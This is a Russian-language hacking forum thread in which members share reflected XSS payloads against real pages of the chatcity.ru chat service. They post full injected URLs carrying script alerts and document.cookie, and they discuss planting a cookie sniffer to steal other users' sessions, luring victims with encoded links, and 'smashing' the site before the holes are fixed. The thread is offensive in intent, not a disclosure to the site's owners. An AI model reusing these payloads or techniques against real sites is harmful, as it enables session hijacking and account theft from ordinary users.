Дыры в Чатсити
 

Ходил по чатсити, зашёл в какой то татарский чат. Начал там пробовать что либо сделать, без особой надежды на успех.. И вот кое что нашёл, когда делается запрос на приват, человек который предлогал приват ушёл, я потом нажал вход в приват и вылезло это:
_http://www.38557.chatcity.ru/kpobatka?f=45&newwin=1&id2=9919&id=6595wr35Ou9b&c= 38557
(это только тогда, когда ты находишься в чате)
Вылезло окно, мне написали: *Этот человек упал слишком надолго и ему теперь надо перезайти.*
Потом я вышел из чата, и попробовал зайти по тому же адресу:
_http://www.38557.chatcity.ru/kpobatka?f=45&newwin=1&id2=9919&id=6595wr35Ou9b&c= 38557
Мне написали: *Сообщите об ошибке / Send bug report*
Эта надпись была в виде ссылки. Я её открыл, адрес был такой:
_http://www.38557.chatcity.ru/bug/?err=NoChMap(check_user_ids)&http://www.38557.chatcity.ru&f=45&ne...35Ou9b&c=38557

И там уже появилось окно, в нём была описана причина произошедшей ошибки..
Я конечно не говорю что это взлом или уязвимость, но такая череда мне кажется странной.. Щас пробую вызвать алерт.. Если что то получится, обязательно отпишусь.

Вот и на "бездырочном" чатсити я вызвал алерт) Теперь пользуйтесь пока не прикрыли)
_http://www.38557.chatcity.ru/bug/?err=NoChMap(check_user_ids)&http://www.38557.chatcity.ru&f=45&newwin=1&id2=9919&id=65 95wr35ou9b&c=38557/"><script>alert('Yo')</script>
Хе) Вот и вам всё крутое чатсити)
http://_http://img521.imageshack.us/...1/alert7wm.jpg

PS если есть необходимость, просто заменяйте id чата (у этого айди 38557) и всё:)

Вот нарыл прикольно )

<input type=hidden name=err value="IllegalChannel(get_ch)">
<input type=hidden name=browser value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)">
<input type=hidden name=addr value="0.0.0.0.0">
<input type=hidden name=via value="">
<input type=hidden name=referer value="http://1498.chatcity.ru/kpobatka?f=rrtert">
<input type=hidden name=args value="1498.chatcity.ru&f=rrtert">

Зачем Админ не сделал скрипт простой отправки ? мне так кажится можна им воспользоваться, если сохранить это у себя на машине.

В общем, теперь чатсити не неломаемое:) Разснесут его в щепки, имхо) Если дыры не прикроют

попробуйте сначала кукисы получить через алертик (xss), тогда сразу видно будет что что-то стоящее нашли))))

Кстати да, Rebz верно говоришь) Вчера небыло времени ещё тестить на куки.. Сегодня попробую)
Главное что хоть что то есть)

Вот п3.14.дец.. Сниффер не получается воткнуть..( Ну то есть втыкается он, но куки не приходят..(
Буду ещё искать дырки, люди, помогайте) Вместе мы снесём чатсити:)

Так-с.. Нашёл ещё одну..
_http://www.38557.chatcity.ru/kpobatka?f=45&newwin=1&id2=9919&id=6595wr35Ou9b&c= 38557"><script>alert('Yo')</script>
Сначало выпадает окошко о прекращении связи и с вопросом об перезаходе,
(_http://img62.imageshack.us/img62/2659/quest4jr.jpg) нажимаете ОТМЕНА, и сразу же запускается алерт.. И опять же, как и в том случае, "> "вшивается" в тело страницы..
_http://img472.imageshack.us/img472/416/alert20gy.jpg

Увидел тему пошёл искать уязвимости. Как найду тут отпишусь.

Автор, вставляй не alert('text'), а alert(document.cookie);.. хоть пассивную xss-ку найти можно..

но пока чё-то не получается.. если вот так взять..
можно попробовать залогиниться и ссылку кому-нить дать затестить..

Rebz, если алерт проходит, то уже значит дыра есть, а раз дыра, то 80-90% что там xss..

PS у меня ник есть) Или называй слип, меня так все называют)

Ты сунул комунить , на съедение ? если что не забудь закодировать в 16 битном.

_http://www.38557.chatcity.ru/bug/?err=NoChMap(check_user_ids)&http://www.38557.chatcity.ru&f=45&newwin=1&id2=9919&id=65 95wr35ou9b&c=38557/"><script>alert('Yo')</script>
Вот эту давал себе на съедение) Не приходят куки..
А с этой не пробовал:
_http://www.38557.chatcity.ru/kpobatka?f=45&newwin=1&id2=9919&id=6595wr35Ou9b&c= 38557"><script>alert('Yo')</script>
И ещё одно, со второй дыркой (см. выше) интересная вещь.. Когда заходишь, ну пишет о прекращении связи, нажимаешь отмену, выпадает алерт, потом нажимаешь на ссылку *Сообщить об ошибке* и на открывающейся странице, алерт уже выпадает автоматом) Хотя в адресной строке его нету) Ну и на открывшейся странице, можно просмотреть свой айпишник и т.д.)

Ну что, люди, кто нибудь что нить интересное нашёл?

давай уже из алертов xss делай... а то на полпути остановился..

Там есть xss, только сниффер не получается вогнать((

может пригодиться, ещё один алерт
_http://romashka.krovatka.ru/k?f=60&id=6226VLpq63TU&c=8&st=</script><script>alert(document.cookie)</script><h1>xss%20by%20Antoshka2003</h1&nc=2162

Ну, вообще-то сниффер не всегда можно впарить...например ссылка на сниффер заключается в кавычки, а на сайте стоит на них филтр...получается, что алерт вылетает на раз, а толку-ноль.

Ещё небольшое добавление по чатсити..
Во первых расшарил форму входа в чат, так, на всякий случай, может кому то пригодится:
И ещё одна xss:
_http://www.38557.chatcity.ru/people/pp10.cgi?c=38557&str=%3Cscript%3Ealert%28%27Yo%27% 29%3C%2Fscript%3E
Они лолы, на самом видном месте.. На поиске какой либо анкеты..

Вот ты несколько xss нашел..а заюзать уже смог?

Нет.. Проверял на себе, не проходит сниффер..

а что за код,и куда его вставлять?

Если ты про код xss, то в адресную строку.. Если про форму входа, то хоть куда.. На форум или сайт.. Без разницы..